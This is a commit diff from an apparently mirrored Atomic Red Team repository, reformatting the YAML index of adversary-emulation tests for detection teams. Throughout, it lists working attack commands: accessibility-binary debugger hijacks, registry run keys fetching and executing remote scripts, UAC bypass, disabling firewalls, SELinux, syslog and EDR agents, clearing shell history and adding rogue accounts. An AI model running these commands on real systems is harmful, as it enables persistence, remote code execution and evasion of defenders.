security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2018-10-20 19:38:18 +00:00
parent ae418fec76
commit 8db4f8c2a3
1 changed files with 1608 additions and 960 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/index.yaml
+1608 -960
View File
@@ -49,8 +49,9 @@ persistence:
identifier: T1156
atomic_tests:
- name: ".bash_profile and .bashrc"
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -140,8 +141,9 @@ persistence:
identifier: T1015
atomic_tests:
- name: Attaches Command Prompt As Debugger To Process - osk
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -151,11 +153,15 @@ persistence:
default: osk.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -165,11 +171,15 @@ persistence:
default: sethc.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -179,11 +189,15 @@ persistence:
default: utilman.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -193,11 +207,15 @@ persistence:
default: magnify.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -207,11 +225,15 @@ persistence:
default: narrator.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -221,11 +243,15 @@ persistence:
default: DisplaySwitch.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -235,8 +261,11 @@ persistence:
default: atbroker.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
'':
technique:
name: Winlogon Helper DLL
@@ -381,8 +410,10 @@ persistence:
identifier: T1103
atomic_tests:
- name: Install AppInit Shim
description: |
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
supported_platforms:
- windows
input_arguments:
@@ -392,8 +423,9 @@ persistence:
default: T1103.reg
executor:
name: command_prompt
command: |
reg.exe import #{registry_file}
command: 'reg.exe import #{registry_file}
'
T1138:
technique:
name: Application Shimming
@@ -463,14 +495,16 @@ persistence:
identifier: T1138
atomic_tests:
- name: Application Shim Installation
description: |
This test injects a DLL into a custom application
description: 'This test injects a DLL into a custom application
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
sdbinst.exe AtomicShimx86.sdb
command: 'sdbinst.exe AtomicShimx86.sdb
'
T1197:
technique:
name: BITS Jobs
@@ -568,8 +602,10 @@ persistence:
- windows
executor:
name: command_prompt
command: |
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1
command: 'bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
%TEMP%\bitsadmin_flag.ps1
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -578,8 +614,10 @@ persistence:
- windows
executor:
name: powershell
command: |
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
command: 'Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
-Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
'
T1176:
technique:
name: Browser Extensions
@@ -668,8 +706,9 @@ persistence:
identifier: T1176
atomic_tests:
- name: Chrome (Developer Mode)
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- windows
@@ -685,8 +724,9 @@ persistence:
3. Click 'Select'
- name: Chrome (Chrome Web Store)
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- windows
@@ -699,8 +739,9 @@ persistence:
2. Click 'Add to Chrome'
- name: Firefox
description: |
Create a file called test.wma, with the duration of 30 seconds
description: 'Create a file called test.wma, with the duration of 30 seconds
'
supported_platforms:
- linux
- windows
@@ -780,8 +821,9 @@ persistence:
identifier: T1042
atomic_tests:
- name: Change Default File Association
description: |
Change Default File Association From cmd.exe
description: 'Change Default File Association From cmd.exe
'
supported_platforms:
- windows
input_arguments:
@@ -795,8 +837,9 @@ persistence:
default: C:\Program Files\Windows Media Player\wmplayer.exe
executor:
name: command_prompt
command: |
cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
command: 'cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
'
T1122:
technique:
name: Component Object Model Hijacking
@@ -857,8 +900,9 @@ persistence:
identifier: T1122
atomic_tests:
- name: Component Object Model Hijacking
description: |
Hijack COM Object used by certutil.exe
description: 'Hijack COM Object used by certutil.exe
'
supported_platforms:
- windows
executor:
@@ -914,8 +958,9 @@ persistence:
identifier: T1136
atomic_tests:
- name: Create a user account on a Linux system
description: |
Create a user via useradd
description: 'Create a user via useradd
'
supported_platforms:
- linux
input_arguments:
@@ -929,11 +974,13 @@ persistence:
default: Evil Account
executor:
name: bash
command: |
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
command: 'useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
'
- name: Create a user account on a MacOS system
description: |
Creates a user on a MacOS system with dscl
description: 'Creates a user on a MacOS system with dscl
'
supported_platforms:
- macos
input_arguments:
@@ -955,8 +1002,9 @@ persistence:
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
- name: Create a new user in a command prompt
description: |
Creates a new user in a command prompt
description: 'Creates a new user in a command prompt
'
supported_platforms:
- windows
input_arguments:
@@ -966,11 +1014,13 @@ persistence:
default: Evil Account
executor:
name: command_prompt
command: |
net user /add #{username}
command: 'net user /add #{username}
'
- name: Create a new user in PowerShell
description: |
Creates a new user in PowerShell
description: 'Creates a new user in PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -1063,8 +1113,9 @@ persistence:
identifier: T1158
atomic_tests:
- name: Create a hidden file in a hidden directory
description: |
Creates a hidden file inside a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
supported_platforms:
- linux
- macos
@@ -1074,17 +1125,21 @@ persistence:
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
- name: Mac Hidden file
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
command: 'sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00
00 00 40 00 FF FF FF FF 00 00"
'
- name: Hidden file
description: |
mv file to a .file
description: 'mv file to a .file
'
supported_platforms:
- macos
- linux
@@ -1099,38 +1154,46 @@ persistence:
default: "/tmp/evil"
executor:
name: sh
command: |
mv #{filename} .#{output_filename}
command: 'mv #{filename} .#{output_filename}
'
- name: Hidden files
description: |
Requieres Apple Dev Tools
description: 'Requieres Apple Dev Tools
'
supported_platforms:
- macos
executor:
name: sh
command: |
setfile -a V #{filename}
command: 'setfile -a V #{filename}
'
- name: Hide a Directory
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
chflags hidden #{filename}
command: 'chflags hidden #{filename}
'
- name: Show all hidden files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
defaults write com.apple.finder AppleShowAllFiles YES
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
- name: Create visible Directories
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -1142,8 +1205,9 @@ persistence:
ls
ls visible-directory
- name: Create hidden directories and files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -1155,8 +1219,10 @@ persistence:
ls -la
ls -la .hidden-directory
- name: Create ADS command prompt
description: |
Create an Alternate Data Stream with the command prompt. Write access is required.
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
supported_platforms:
- windows
input_arguments:
@@ -1175,8 +1241,10 @@ persistence:
echo "test" > :#{ads_filename}
dir /s /r | find ":$DATA"
- name: Create ADS PowerShell
description: |
Create an Alternate Data Stream with PowerShell. Write access is required.
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
supported_platforms:
- windows
input_arguments:
@@ -1314,8 +1382,9 @@ persistence:
identifier: T1179
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: |
Hooks functions in PowerShell to read TLS Communications
description: 'Hooks functions in PowerShell to read TLS Communications
'
supported_platforms:
- windows
input_arguments:
@@ -1481,8 +1550,9 @@ persistence:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -1496,11 +1566,14 @@ persistence:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
description: |
Leverage Global Flags Settings
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
@@ -1514,8 +1587,14 @@ persistence:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}"
/v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess
/d "#{payload_binary}"
'
T1159:
technique:
name: Launch Agent
@@ -1598,8 +1677,9 @@ persistence:
identifier: T1159
atomic_tests:
- name: Launch Agent
description: |
Create a plist and execute it
description: 'Create a plist and execute it
'
supported_platforms:
- macos
executor:
@@ -1700,8 +1780,9 @@ persistence:
identifier: T1160
atomic_tests:
- name: Launch Daemon
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -1785,14 +1866,16 @@ persistence:
identifier: T1152
atomic_tests:
- name: Launchctl
description: |
Utilize launchctl
description: 'Utilize launchctl
'
supported_platforms:
- macos
executor:
name: sh
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
T1168:
technique:
name: Local Job Scheduling
@@ -1880,8 +1963,9 @@ persistence:
identifier: T1168
atomic_tests:
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -1894,11 +1978,13 @@ persistence:
default: "/tmp/evil.sh"
executor:
name: sh
command: |
echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
'
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -2000,8 +2086,9 @@ persistence:
identifier: T1037
atomic_tests:
- name: Logon Scripts
description: |
Added Via Reg.exe
description: 'Added Via Reg.exe
'
supported_platforms:
- windows
input_arguments:
@@ -2011,11 +2098,14 @@ persistence:
default: cmd.exe /c calc.exe
executor:
name: command_prompt
command: |
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
command: 'REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ
/d "#{script_command}"
'
- name: Logon Scripts - Mac
description: |
Mac logon script
description: 'Mac logon script
'
supported_platforms:
- macos
executor:
@@ -2175,8 +2265,10 @@ persistence:
identifier: T1128
atomic_tests:
- name: Netsh Helper DLL Registration
description: |
Netsh interacts with other operating system components using dynamic-link library (DLL) files
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
'
supported_platforms:
- windows
input_arguments:
@@ -2186,8 +2278,9 @@ persistence:
default: C:\Path\file.dll
executor:
name: command_prompt
command: |
netsh.exe add helper #{helper_file}
command: 'netsh.exe add helper #{helper_file}
'
T1050:
technique:
name: New Service
@@ -2258,8 +2351,9 @@ persistence:
identifier: T1050
atomic_tests:
- name: Service Installation
description: |
Installs A Local Service
description: 'Installs A Local Service
'
supported_platforms:
- windows
input_arguments:
@@ -2279,8 +2373,9 @@ persistence:
sc.exe stop #{service_name}
sc.exe delete #{service_name}
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: |
Installs A Local Service via PowerShell
description: 'Installs A Local Service via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -2500,8 +2595,9 @@ persistence:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -2571,8 +2667,10 @@ persistence:
- macos
executor:
name: sh
command: |
echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"''
>> /etc/rc.common
'
T1164:
technique:
name: Re-opened Applications
@@ -2695,8 +2793,9 @@ persistence:
identifier: T1060
atomic_tests:
- name: Reg Key Run
description: |
Run Key Persistence
description: 'Run Key Persistence
'
supported_platforms:
- windows
input_arguments:
@@ -2710,8 +2809,9 @@ persistence:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
- name: Reg Key RunOnce
description: |
RunOnce Key Persistence
description: 'RunOnce Key Persistence
'
supported_platforms:
- windows
input_arguments:
@@ -2725,8 +2825,9 @@ persistence:
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
- name: PowerShell Registry RunOnce
description: |
RunOnce Key Persistence via PowerShell
description: 'RunOnce Key Persistence via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -2741,8 +2842,9 @@ persistence:
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
- name: Startup Folder
description: |
Add Shortcut To Startup via PowerShell
description: 'Add Shortcut To Startup via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -2858,8 +2960,9 @@ persistence:
- windows
executor:
name: command_prompt
command: |
at 13:20 /interactive cmd
command: 'at 13:20 /interactive cmd
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -2875,11 +2978,13 @@ persistence:
default: 72600
executor:
name: command_prompt
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
- name: Scheduled task Remote
description: |
Create a task on a remote system
description: 'Create a task on a remote system
'
supported_platforms:
- windows
input_arguments:
@@ -2905,8 +3010,10 @@ persistence:
default: At0micStrong
executor:
name: command_prompt
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
T1180:
technique:
name: Screensaver
@@ -2967,8 +3074,11 @@ persistence:
identifier: T1180
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
description: |
This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
description: 'This test copies a binary into the Windows System32 folder and
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
'
supported_platforms:
- windows
input_arguments:
@@ -3052,11 +3162,14 @@ persistence:
- macos
executor:
name: manual
steps: |
1. /Library/StartupItems/StartupParameters.plist
steps: '1. /Library/StartupItems/StartupParameters.plist
'
- name: Startup Items (emond rule)
description: |
Establish persistence via a rule run by emond daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
description: 'Establish persistence via a rule run by emond daemon at startup,
based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
supported_platforms:
- macos
input_arguments:
@@ -3485,8 +3598,10 @@ defense-evasion:
- windows
executor:
name: command_prompt
command: |
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1
command: 'bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
%TEMP%\bitsadmin_flag.ps1
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -3495,8 +3610,10 @@ defense-evasion:
- windows
executor:
name: powershell
command: |
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
command: 'Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
-Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
'
T1009:
technique:
name: Binary Padding
@@ -3535,8 +3652,10 @@ defense-evasion:
identifier: T1009
atomic_tests:
- name: Pad Evil Binary to Change Hash
description: |
Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution
description: 'Copies cat to create an "evil binary" and pads it with a zero
to change the hash without harming execution
'
supported_platforms:
- macos
- linux
@@ -3657,8 +3776,10 @@ defense-evasion:
identifier: T1088
atomic_tests:
- name: Bypass UAC using Event Viewer
description: |
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
@@ -3746,8 +3867,10 @@ defense-evasion:
identifier: T1191
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
description: |
Adversaries may supply CMSTP.exe with INF files infected with malicious commands
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
supported_platforms:
- windows
input_arguments:
@@ -3757,11 +3880,14 @@ defense-evasion:
default: T1191.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_path}
command: 'cmstp.exe /s #{inf_file_path}
'
- name: CMSTP Executing UAC Bypass
description: |
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
supported_platforms:
- windows
input_arguments:
@@ -3771,8 +3897,9 @@ defense-evasion:
default: T1191_uacbypass.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_uac} /au
command: 'cmstp.exe /s #{inf_file_uac} /au
'
T1146:
technique:
name: Clear Command History
@@ -3816,57 +3943,69 @@ defense-evasion:
identifier: T1146
atomic_tests:
- name: Clear Bash history (rm)
description: |
Clears bash history via rm
description: 'Clears bash history via rm
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
rm ~/.bash_history
command: 'rm ~/.bash_history
'
- name: Clear Bash history (echo)
description: |
Clears bash history via rm
description: 'Clears bash history via rm
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
echo "" > ~/.bash_history
command: 'echo "" > ~/.bash_history
'
- name: Clear Bash history (cat dev/null)
description: |
Clears bash history via cat /dev/null
description: 'Clears bash history via cat /dev/null
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
cat /dev/null > ~/.bash_history
command: 'cat /dev/null > ~/.bash_history
'
- name: Clear Bash history (ln dev/null)
description: |
Clears bash history via a symlink to /dev/null
description: 'Clears bash history via a symlink to /dev/null
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
ln -sf /dev/null ~/.bash_history
command: 'ln -sf /dev/null ~/.bash_history
'
- name: Clear Bash history (truncate)
description: |
Clears bash history via truncate
description: 'Clears bash history via truncate
'
supported_platforms:
- linux
executor:
name: sh
command: |
truncate -s0 ~/.bash_history
command: 'truncate -s0 ~/.bash_history
'
- name: Clear history of a bunch of shells
description: |
Clears the history of a bunch of different shell types by setting the history size to zero
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
'
supported_platforms:
- linux
- macos
@@ -4001,8 +4140,9 @@ defense-evasion:
identifier: T1122
atomic_tests:
- name: Component Object Model Hijacking
description: |
Hijack COM Object used by certutil.exe
description: 'Hijack COM Object used by certutil.exe
'
supported_platforms:
- windows
executor:
@@ -4181,8 +4321,9 @@ defense-evasion:
identifier: T1140
atomic_tests:
- name: Deobfuscate/Decode Files Or Information
description: |
Encode/Decode executable
description: 'Encode/Decode executable
'
supported_platforms:
- windows
input_arguments:
@@ -4196,8 +4337,10 @@ defense-evasion:
certutil.exe -encode #{executable} file.txt
certutil.exe -decode file.txt #{executable}
- name: Certutil Rename and Decode
description: |
Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
'
supported_platforms:
- windows
input_arguments:
@@ -4257,8 +4400,9 @@ defense-evasion:
identifier: T1089
atomic_tests:
- name: Disable iptables firewall
description: |
Disables the iptables firewall
description: 'Disables the iptables firewall
'
supported_platforms:
- linux
executor:
@@ -4275,8 +4419,9 @@ defense-evasion:
systemctl disable firewalld
fi
- name: Disable syslog
description: |
Disables syslog collection
description: 'Disables syslog collection
'
supported_platforms:
- linux
executor:
@@ -4291,8 +4436,9 @@ defense-evasion:
systemctl disable rsyslog
fi
- name: Disable Cb Response
description: |
Disable the Cb Response service
description: 'Disable the Cb Response service
'
supported_platforms:
- linux
executor:
@@ -4307,41 +4453,49 @@ defense-evasion:
systemctl disable cbdaemon
fi
- name: Disable SELinux
description: |
Disables SELinux enforcement
description: 'Disables SELinux enforcement
'
supported_platforms:
- linux
executor:
name: sh
command: |
setenforce 0
command: 'setenforce 0
'
- name: Disable Carbon Black Response
description: |
Disables Carbon Black Response
description: 'Disables Carbon Black Response
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
'
- name: Disable LittleSnitch
description: |
Disables LittleSnitch
description: 'Disables LittleSnitch
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
'
- name: Disable OpenDNS Umbrella
description: |
Disables OpenDNS Umbrella
description: 'Disables OpenDNS Umbrella
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
'
- name: Unload Sysmon Filter Driver
description: "Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service. \n"
@@ -4355,8 +4509,9 @@ defense-evasion:
default: SysmonDrv
executor:
name: command_prompt
command: |
fltmc.exe unload #{sysmon_driver}
command: 'fltmc.exe unload #{sysmon_driver}
'
T1107:
technique:
name: File Deletion
@@ -4411,8 +4566,10 @@ defense-evasion:
identifier: T1107
atomic_tests:
- name: Victim configuration
description: |
Create a temporary directory and several files on the victim system for later deletion
description: 'Create a temporary directory and several files on the victim system
for later deletion
'
supported_platforms:
- linux
executor:
@@ -4423,35 +4580,45 @@ defense-evasion:
touch a b c d e f g
echo "This file will be shredded" > /tmp/victim-shred.txt
- name: Delete a single file
description: |
Delete a single file from the temporary directory
description: 'Delete a single file from the temporary directory
'
supported_platforms:
- linux
executor:
name: sh
command: |
rm -f /tmp/victim-files/a
command: 'rm -f /tmp/victim-files/a
'
- name: Delete an entire folder
description: |
Recursively delete the temporary directory and all files contained within it
description: 'Recursively delete the temporary directory and all files contained
within it
'
supported_platforms:
- linux
executor:
name: sh
command: |
rm -rf /tmp/victim-files
command: 'rm -rf /tmp/victim-files
'
- name: Overwrite and delete a file with shred
description: |
Use the `shred` command to overwrite the temporary file and then delete it
description: 'Use the `shred` command to overwrite the temporary file and then
delete it
'
supported_platforms:
- linux
executor:
name: sh
command: |
shred -u /tmp/victim-shred.txt
command: 'shred -u /tmp/victim-shred.txt
'
- name: Victim configuration
description: |
Create a temporary directory and several files on the victim system for later deletion
description: 'Create a temporary directory and several files on the victim system
for later deletion
'
supported_platforms:
- windows
executor:
